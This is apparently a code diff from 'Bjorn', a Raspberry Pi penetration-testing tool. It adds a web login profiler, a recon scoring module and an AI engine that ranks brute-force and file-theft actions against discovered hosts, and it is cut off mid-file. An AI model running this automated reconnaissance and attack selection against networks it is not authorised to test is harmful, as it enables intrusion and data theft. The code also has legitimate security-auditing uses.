if status == "success": if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.") logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted": elif status == "interrupted":

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -8,6 +8,7 @@ import argparse
import requests import requests
import subprocess import subprocess
from datetime import datetime from datetime import datetime
import logging import logging
# ── METADATA / UI FOR NEO LAUNCHER ──────────────────────────────────────────── # ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
@@ -172,8 +173,9 @@ class WPAsecPotfileManager:
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True) response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status() response.raise_for_status()
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S") ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True) os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file: with open(filename, "wb") as file:

File diff suppressed because it is too large Load Diff

867
ai_engine.py Normal file
View File

@@ -0,0 +1,867 @@
"""
ai_engine.py - Dynamic AI Decision Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Lightweight AI decision engine for Raspberry Pi Zero.
Works in tandem with deep learning model trained on external PC.
Architecture:
- Lightweight inference engine (no TensorFlow/PyTorch on Pi)
- Loads pre-trained model weights from PC
- Real-time action selection
- Automatic feature extraction
- Fallback to heuristics when model unavailable
Model Pipeline:
1. Pi: Collect data → Export → Transfer to PC
2. PC: Train deep neural network → Export lightweight model
3. Pi: Load model → Use for decision making
4. Repeat: Continuous learning cycle
Author: Bjorn Team
Version: 2.0.0
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="ai_engine.py", level=20)
class BjornAIEngine:
"""
Dynamic AI engine for action selection and prioritization.
Uses pre-trained model from external PC or falls back to heuristics.
"""
def __init__(self, shared_data, model_dir: str = None):
"""
Initialize AI engine
"""
self.shared_data = shared_data
self.db = shared_data.db
if model_dir is None:
self.model_dir = Path(getattr(shared_data, 'ai_models_dir', '/home/bjorn/ai_models'))
else:
self.model_dir = Path(model_dir)
self.model_dir.mkdir(parents=True, exist_ok=True)
# Model state
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self.last_server_attempted = False
self.last_server_contact_ok = None
# Try to load latest model
self._load_latest_model()
# Fallback heuristics (always available)
self._init_heuristics()
logger.info(
f"AI Engine initialized (model_loaded={self.model_loaded}, "
f"heuristics_available=True)"
)
# ═══════════════════════════════════════════════════════════════════════
# MODEL LOADING
# ═══════════════════════════════════════════════════════════════════════
def _load_latest_model(self):
"""Load the most recent model from model directory"""
try:
# Find all potential model configs
all_json_files = [f for f in self.model_dir.glob("bjorn_model_*.json")
if "_weights.json" not in f.name]
# 1. Filter for files that have matching weights
valid_models = []
for f in all_json_files:
weights_path = f.with_name(f.stem + '_weights.json')
if weights_path.exists():
valid_models.append(f)
else:
logger.debug(f"Skipping model {f.name}: Weights file missing")
if not valid_models:
logger.info(f"No complete models found in {self.model_dir}. Checking server...")
# Try to download from server
if self.check_for_updates():
return
logger.info_throttled(
"No AI model available (server offline or empty). Using heuristics only.",
key="ai_no_model_available",
interval_s=600.0,
)
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
self.model_loaded = True
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self._load_latest_model()
return self.model_loaded
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
self.last_server_contact_ok = None
try:
import requests
import os
except ImportError:
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
return False
try:
logger.debug(f"Checking AI Server for updates at {url}/model/latest")
from ai_utils import get_system_mac
params = {'mac_addr': get_system_mac()}
self.last_server_attempted = True
resp = requests.get(f"{url}/model/latest", params=params, timeout=5)
# Any HTTP response means server is reachable.
self.last_server_contact_ok = True
if resp.status_code != 200:
return False
remote_config = resp.json()
remote_version = str(remote_config.get("version", "")).strip()
if not remote_version:
return False
current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"
if remote_version > current_version:
logger.info(f"New model available: {remote_version} (Local: {current_version})")
# Download config (stream to avoid loading the whole file into RAM)
r_conf = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}.json",
stream=True, timeout=15,
)
if r_conf.status_code == 200:
conf_path = self.model_dir / f"bjorn_model_{remote_version}.json"
with open(conf_path, 'wb') as f:
for chunk in r_conf.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
else:
logger.info_throttled(
f"AI model download skipped (config HTTP {r_conf.status_code})",
key=f"ai_model_dl_conf_{r_conf.status_code}",
interval_s=300.0,
)
return False
# Download weights (stream to avoid loading the whole file into RAM)
r_weights = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}_weights.json",
stream=True, timeout=30,
)
if r_weights.status_code == 200:
weights_path = self.model_dir / f"bjorn_model_{remote_version}_weights.json"
with open(weights_path, 'wb') as f:
for chunk in r_weights.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
logger.success(f"Downloaded model {remote_version} files to Pi.")
else:
logger.info_throttled(
f"AI model download skipped (weights HTTP {r_weights.status_code})",
key=f"ai_model_dl_weights_{r_weights.status_code}",
interval_s=300.0,
)
return False
# Reload explicitly
return self.reload_model()
logger.debug(f"Server model ({remote_version}) is not newer than local ({current_version})")
return False
except Exception as e:
self.last_server_attempted = True
self.last_server_contact_ok = False
# Server may be offline; avoid spamming errors in AI mode.
logger.info_throttled(
f"AI server unavailable for model update check: {e}",
key="ai_model_update_check_failed",
interval_s=300.0,
)
return False
# ═══════════════════════════════════════════════════════════════════════
# DECISION MAKING
# ═══════════════════════════════════════════════════════════════════════
def choose_action(
self,
host_context: Dict[str, Any],
available_actions: List[str],
exploration_rate: float = None
) -> Tuple[str, float, Dict[str, Any]]:
"""
Choose the best action for a given host.
Args:
host_context: Dict with host information (mac, ports, hostname, etc.)
available_actions: List of action names that can be executed
exploration_rate: Probability of random exploration (0.0-1.0)
Returns:
Tuple of (action_name, confidence_score, debug_info)
"""
if exploration_rate is None:
exploration_rate = float(getattr(self.shared_data, "ai_exploration_rate", 0.1))
try:
# Exploration: random action
if exploration_rate > 0 and np.random.random() < exploration_rate:
import random
action = random.choice(available_actions)
return action, 0.0, {'method': 'exploration', 'exploration_rate': exploration_rate}
# If model is loaded, use it for prediction
if self.model_loaded and self.model_weights:
return self._predict_with_model(host_context, available_actions)
# Fallback to heuristics
return self._predict_with_heuristics(host_context, available_actions)
except Exception as e:
logger.error(f"Error choosing action: {e}")
# Ultimate fallback: first available action
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'no_actions', 'error': 'No available actions'}
def _predict_with_model(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use loaded neural network model for prediction.
Dynamically maps extracted features to model manifest.
"""
try:
from ai_utils import extract_neural_features_dict
# 1. Get model feature manifest
manifest = self.model_config.get('architecture', {}).get('feature_names', [])
if not manifest:
# Legacy fallback
return self._predict_with_model_legacy(host_context, available_actions)
# 2. Extract host-level features
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
host_data = self._get_host_context_from_db(mac, host)
net_data = self._get_network_context()
temp_data_base = self._get_temporal_context(mac) # MAC-level temporal, called once
best_action = None
best_score = -1.0
all_scores = {}
# 3. Score each action
for action in available_actions:
action_data = self._get_action_context(action, host, mac)
# Merge action-level temporal overrides into temporal context copy
temp_data = dict(temp_data_base)
temp_data['same_action_attempts'] = action_data.pop('same_action_attempts', 0)
temp_data['is_retry'] = action_data.pop('is_retry', False)
# Extract all known features into a dict
features_dict = extract_neural_features_dict(
host_features=host_data,
network_features=net_data,
temporal_features=temp_data,
action_features=action_data
)
# Dynamic mapping: Pull features requested by model manifest
# Defaults to 0.0 if the Pi doesn't know this feature yet
input_vector = np.array([float(features_dict.get(name, 0.0)) for name in manifest], dtype=float)
# Neural inference (supports variable hidden depth from exported model).
z_out = self._forward_network(input_vector)
z_out = np.array(z_out).reshape(-1)
if z_out.size == 1:
# Binary classifier exported with 1-neuron sigmoid output.
score = float(self._sigmoid(z_out[0]))
else:
probs = self._softmax(z_out)
score = float(probs[1] if len(probs) > 1 else probs[0])
all_scores[action] = score
if score > best_score:
best_score = score
best_action = action
if best_action is None:
return self._predict_with_heuristics(host_context, available_actions)
# Capture the last input vector (for visualization)
# Since we iterate, we'll just take the one from the best_action or the last one.
# Usually input_vector is almost the same for all actions except action-specific bits.
debug_info = {
'method': 'neural_network_v3',
'model_version': self.model_config.get('version'),
'feature_count': len(manifest),
'all_scores': all_scores,
# Convert numpy ndarray → plain Python list so debug_info is
# always JSON-serialisable (scheduler stores it in action_queue metadata).
'input_vector': input_vector.tolist(),
}
return best_action, float(best_score), debug_info
except Exception as e:
logger.error(f"Dynamic model prediction failed: {e}")
import traceback
logger.debug(traceback.format_exc())
return self._predict_with_heuristics(host_context, available_actions)
def _predict_with_model_legacy(self, host_context: Dict[str, Any], available_actions: List[str]) -> Tuple[str, float, Dict[str, Any]]:
"""Fallback for models without feature_names manifest (fixed length 56)"""
# ... very similar to previous v2 but using hardcoded list ...
return self._predict_with_heuristics(host_context, available_actions)
def _get_host_context_from_db(self, mac: str, host: Dict) -> Dict:
"""Helper to collect host features from DB"""
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
vendor = host.get('vendor', '')
# Calculate age
age_hours = 0.0
if host.get('first_seen'):
from datetime import datetime
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
age_hours = (datetime.now() - first_seen).total_seconds() / 3600
except: pass
creds = self._get_credentials_for_host(mac)
return {
'port_count': len(ports),
'service_count': len(self._get_services_for_host(mac)),
'ip_count': len((host.get('ips') or '').split(';')),
'credential_count': len(creds),
'age_hours': round(age_hours, 2),
'has_ssh': 22 in ports,
'has_http': 80 in ports or 8080 in ports,
'has_https': 443 in ports,
'has_smb': 445 in ports,
'has_rdp': 3389 in ports,
'has_database': any(p in ports for p in [3306, 5432, 1433]),
'has_credentials': len(creds) > 0,
'is_new': age_hours < 24,
'is_private': True, # Simple assumption for now
'has_multiple_ips': len((host.get('ips') or '').split(';')) > 1,
'vendor_category': self._categorize_vendor(vendor),
'port_profile': self._detect_port_profile(ports)
}
def _get_network_context(self) -> Dict:
"""Collect real network-wide stats from DB (called once per choose_action)."""
try:
all_hosts = self.db.get_all_hosts()
total = len(all_hosts)
# Subnet diversity
subnets = set()
active = 0
for h in all_hosts:
ips = (h.get('ips') or '').split(';')
for ip in ips:
ip = ip.strip()
if ip:
subnets.add('.'.join(ip.split('.')[:3]))
break
if h.get('alive'):
active += 1
return {
'total_hosts': total,
'subnet_count': len(subnets),
'similar_vendor_count': 0, # filled by caller if needed
'similar_port_profile_count': 0, # filled by caller if needed
'active_host_ratio': round(active / total, 2) if total else 0.0,
}
except Exception as e:
logger.error(f"Error collecting network context: {e}")
return {
'total_hosts': 0, 'subnet_count': 1,
'similar_vendor_count': 0, 'similar_port_profile_count': 0,
'active_host_ratio': 1.0,
}
def _get_temporal_context(self, mac: str) -> Dict:
"""
Collect real temporal features for a MAC from DB.
same_action_attempts / is_retry are action-specific — they are NOT
included here; instead they are merged from _get_action_context()
inside the per-action loop in _predict_with_model().
"""
from datetime import datetime
now = datetime.now()
ctx = {
'hour_of_day': now.hour,
'day_of_week': now.weekday(),
'is_weekend': now.weekday() >= 5,
'is_night': now.hour < 6 or now.hour >= 22,
'previous_action_count': 0,
'seconds_since_last': 0,
'historical_success_rate': 0.0,
'same_action_attempts': 0, # placeholder; overwritten per-action
'is_retry': False, # placeholder; overwritten per-action
'global_success_rate': 0.0,
'hours_since_discovery': 0,
}
try:
# Per-host stats from ml_features (persistent training log)
rows = self.db.query(
"""
SELECT
COUNT(*) AS cnt,
AVG(CAST(success AS REAL)) AS success_rate,
MAX(timestamp) AS last_ts
FROM ml_features
WHERE mac_address = ?
""",
(mac,),
)
if rows and rows[0]['cnt']:
ctx['previous_action_count'] = int(rows[0]['cnt'])
ctx['historical_success_rate'] = round(float(rows[0]['success_rate'] or 0.0), 2)
if rows[0]['last_ts']:
try:
last_dt = datetime.fromisoformat(str(rows[0]['last_ts']))
ctx['seconds_since_last'] = round(
(now - last_dt).total_seconds(), 1
)
except Exception:
pass
# Global success rate (all hosts)
g = self.db.query(
"SELECT AVG(CAST(success AS REAL)) AS gsr FROM ml_features"
)
if g and g[0]['gsr'] is not None:
ctx['global_success_rate'] = round(float(g[0]['gsr']), 2)
# Hours since host first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
ctx['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception:
pass
except Exception as e:
logger.error(f"Error collecting temporal context for {mac}: {e}")
return ctx
# Action-specific temporal fields populated by _get_action_context
_ACTION_PORTS = {
'SSHBruteforce': 22, 'SSHEnumeration': 22, 'StealFilesSSH': 22,
'WebEnumeration': 80, 'WebVulnScan': 80, 'WebLoginProfiler': 80,
'WebSurfaceMapper': 80,
'SMBBruteforce': 445, 'StealFilesSMB': 445,
'FTPBruteforce': 21, 'StealFilesFTP': 21,
'TelnetBruteforce': 23, 'StealFilesTelnet': 23,
'SQLBruteforce': 3306, 'StealDataSQL': 3306,
'NmapVulnScanner': 0, 'NetworkScanner': 0,
'RDPBruteforce': 3389,
}
def _get_action_context(self, action_name: str, host: Dict, mac: str = '') -> Dict:
"""
Collect action-specific features including per-action attempt history.
Merges action-type + target-port info with action-level temporal stats.
"""
action_type = self._classify_action_type(action_name)
target_port = self._ACTION_PORTS.get(action_name, 0)
# If port not in lookup, try to infer from action name
if target_port == 0:
name_lower = action_name.lower()
for svc, port in [('ssh', 22), ('http', 80), ('smb', 445), ('ftp', 21),
('telnet', 23), ('sql', 3306), ('rdp', 3389)]:
if svc in name_lower:
target_port = port
break
ctx = {
'action_type': action_type,
'target_port': target_port,
'is_standard_port': 0 < target_port < 1024,
# Action-level temporal (overrides placeholder in temporal_context)
'same_action_attempts': 0,
'is_retry': False,
}
if mac:
try:
r = self.db.query(
"""
SELECT COUNT(*) AS cnt
FROM ml_features
WHERE mac_address = ? AND action_name = ?
""",
(mac, action_name),
)
attempts = int(r[0]['cnt']) if r else 0
ctx['same_action_attempts'] = attempts
ctx['is_retry'] = attempts > 0
except Exception as e:
logger.debug(f"Action context DB query failed for {action_name}: {e}")
return ctx
def _classify_action_type(self, action_name: str) -> str:
"""Classify action name into a type"""
name = action_name.lower()
if 'brute' in name: return 'bruteforce'
if 'enum' in name or 'scan' in name: return 'enumeration'
if 'exploit' in name: return 'exploitation'
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
# ═══════════════════════════════════════════════════════════════════════
def _init_heuristics(self):
"""Initialize rule-based heuristics for cold start"""
self.heuristics = {
'port_based': {
22: ['SSHBruteforce', 'SSHEnumeration'],
80: ['WebEnumeration', 'WebVulnScan'],
443: ['WebEnumeration', 'SSLScan'],
445: ['SMBBruteforce', 'SMBEnumeration'],
3389: ['RDPBruteforce'],
21: ['FTPBruteforce', 'FTPEnumeration'],
23: ['TelnetBruteforce'],
3306: ['MySQLBruteforce'],
5432: ['PostgresBruteforce'],
1433: ['MSSQLBruteforce']
},
'service_based': {
'ssh': ['SSHBruteforce', 'SSHEnumeration'],
'http': ['WebEnumeration', 'WebVulnScan'],
'https': ['WebEnumeration', 'SSLScan'],
'smb': ['SMBBruteforce', 'SMBEnumeration'],
'ftp': ['FTPBruteforce', 'FTPEnumeration'],
